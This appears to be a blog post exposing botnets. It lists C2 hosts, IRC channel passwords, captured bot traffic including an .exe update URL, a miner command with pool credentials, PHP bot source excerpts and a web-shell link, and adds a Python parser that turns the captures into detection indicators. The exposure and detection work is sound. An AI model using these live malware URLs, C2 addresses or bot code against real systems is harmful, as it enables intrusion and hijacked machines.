xxxd2.com (ngrBot hosted in United States, Clarks Summit, Volumedrive)

Resolved: [xxxd2.com] To [199.168.140.38]

    Remote Host        Port Number
    173.192.224.115    80
    199.15.234.7       80
    199.168.140.38     7777

    PASS Eshuxx
    NICK n{US|XPa}evkfwgc
    USER evkfwgc 0 0 :evkfwgc
    JOIN #eshu Eshuxx
    PRIVMSG #eshu :[d="http://www.fotosprivadas.com/chicas/update/Ruco.exe" s="172032 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0

Hosting infos: http://whois.domaintools.com/199.168.140.38

new.pusikuracbre.me (CoinMiner hosted in Russian Federation, Selectel Ltd.)

From the same lamer here: http://www.exposedbotnets.com/search?q=8332

Resolved: [new.pusikuracbre.me] To [31.186.102.181]
Resolved: [new.pusikuracbre.me] To [31.186.102.180]
Resolved: [new.pusikuracbre.me] To [31.186.102.155]

Running process:

    miner.exe -a 60 -g no -o http://new.pusikuracbre.me:8332/ -u d38a39ys_l3kpy -p el29djggss

Xandora results here. Hosting infos: http://whois.domaintools.com/31.186.102.180

75.77.40.195 (ngrBot hosted in United States, Greenville, Windstream Nuvox Inc)

    Remote Host        Port Number
    199.15.234.7       80
    75.77.40.195       6668

    PASS ngrBot
    PRIVMSG #asiksi# :[DNS]: Blocked "windowsupdate.microsoft.com"
    NICK n{US|XPa}vxpwwmw
    USER vxpwwmw 0 0 :vxpwwmw
    JOIN #asiksi# asdr3ny
    PRIVMSG #asiksi# :[DNS]: Blocked "www.microsoft.com"
    PRIVMSG #asiksi# :[DNS]: Blocked "microsoft.com"
    PRIVMSG #asiksi# :[DNS]: Blocked "update.microsoft.com"

    Now talking in #asiksi#
    Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.com

v1.0 Ultimate phpB (Linux bots hosted in Brazil, Comite Gestor Da Internet No Brasil)

Albanian hacker using PHP bots to flood IRC channels.

    #####################################################################
    # v1.0 Ultimate phpB. Enjoy ! ! ! ! !                               #
    #                                                                   #
    #                      Fixed By TiRoNcI_BoY®                        #
    #                      Albhack@msn.com                              #
    #####################################################################
    <?
    set_time_limit(0);
    error_reporting(0);
    class pBot {
        ####################### V1.0 CONFIGURATION ########################
        var $config = array("server"=>"189.30.30.10",  #
                            "port"=>6667,              // server port #

irc.ganyot.us.to (Linux bots hosted in Korea, Republic Of, Seoul, Hanbiro)

I found this link: http://focori.com.br/images/x.php. It was a PHP shell uploaded to a vulnerable site; inside I found the bot used for exploiting vulnerable sites.

    <?
    /*
     *
     * NOGROD. since 2008
     * IRC.UDPLINK.NET
     *
     * COMMANDS:
     *
     * .user <password>   // login to the bot
     * .logout            // logout of the bot
     * .die               // kill the bot

cube.sdeirc.net (ngrBot hosted in Netherlands, Amsterdam, Ecatel Ltd)

Our anonymous friend pointed to this URL: http://cbteam.ws/ (inside you have samples). I checked the files and found this botnet, whose IPs I already posted in the blog.

Resolved: [cube.sdeirc.net] To [89.248.166.139]

    Remote Host        Port Number
    cube.sdeirc.net    7392

    PASS none
    NICK New{US-XP-x86}1124207
    USER 1124207 "" "1124207" :1124207
    MODE New{US-XP-x86}1124207 +iMmx
    JOIN #a secret
    JOIN #rndbot zrag
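As an added example (not part of these posts and not code from any of the bots shown), a small Python parser that pulls the ngrBot indicators visible in the three IRC captures above out of client-side IRC lines: the n{CC|OS}random and New{CC-OS-arch}id nick formats, the [DNS]: Blocked "domain" notices, and the [d="url" s="N bytes"] update messages, for feeding a detection rule or blocklist. The nick regexes are an assumption generalised from those two captured nick formats, and the sample capture is constructed from the lines shown on this page.

```python
import re
from typing import Dict, List

# Nick formats seen in the captures above: n{US|XPa}evkfwgc and New{US-XP-x86}1124207.
# Assumption: generalised from those two samples only, not a vendor signature.
NICK_RE = re.compile(r"^(?:n\{[A-Z]{2}\|[A-Za-z0-9]+\}|New\{[A-Z]{2}-[A-Za-z0-9-]+\})\w+$")
DNS_BLOCK_RE = re.compile(r'\[DNS\]: Blocked "([^"]+)"')
UPDATE_RE = re.compile(r'\[d="([^"]+)" s="(\d+) bytes"\]')

# Constructed sample: client-to-server lines copied from the captures on this page.
SAMPLE_CAPTURE = [
    "PASS ngrBot",
    "NICK n{US|XPa}vxpwwmw",
    "USER vxpwwmw 0 0 :vxpwwmw",
    "JOIN #asiksi# asdr3ny",
    'PRIVMSG #asiksi# :[DNS]: Blocked "windowsupdate.microsoft.com"',
    'PRIVMSG #asiksi# :[DNS]: Blocked "www.microsoft.com"',
    'PRIVMSG #eshu :[d="http://www.fotosprivadas.com/chicas/update/Ruco.exe" s="172032 bytes"] Updated bot file',
    "NICK normaluser",
]


def parse_irc_capture(lines: List[str]) -> Dict[str, object]:
    """Walk client IRC lines and collect ngrBot-style indicators.

    Returns the bot nick (if any matched), joined channels (keys dropped),
    domains the bot reported blocking, update URLs with their byte sizes,
    and a hit counter so a caller can threshold on it.
    """
    found: Dict[str, object] = {"bot_nick": None, "channels": [], "blocked_domains": [],
                                "update_urls": [], "hits": 0}
    for raw in lines:
        parts = raw.strip().split(" ", 2)
        cmd = parts[0].upper() if parts[0] else ""
        if cmd == "NICK" and len(parts) > 1 and NICK_RE.match(parts[1]):
            found["bot_nick"] = parts[1]
            found["hits"] += 1
        elif cmd == "JOIN" and len(parts) > 1:
            found["channels"].append(parts[1])
        elif cmd == "PRIVMSG":
            m = DNS_BLOCK_RE.search(raw)
            if m:
                found["blocked_domains"].append(m.group(1))
                found["hits"] += 1
            m = UPDATE_RE.search(raw)
            if m:
                found["update_urls"].append((m.group(1), int(m.group(2))))
                found["hits"] += 1
    return found
```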

LilyJade Software (malware downloader hosted in United States, Redmond, Microsoft Corp)

Got the sample from our anonymous friend and here is what it does:

1. Downloads file installer.gif:

    GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1
    User-Agent: NSIS_Inetc (Mozilla)
    Host: stats.crossrider.com
    Connection: Keep-Alive
    Cache-Control: no-cache

2. Downloads and installs fake Chrome. The data identified by the following URLs was then requested from the remote web server:

    http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes
    http://crt.usertrust.com/AddTrustExternalCARoot.p7c
    http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2
    http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml
    http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0
    http://crl.verisign.com/pca3.crl
    http://crl.verisign.com/ThawteTimestampingCA.crl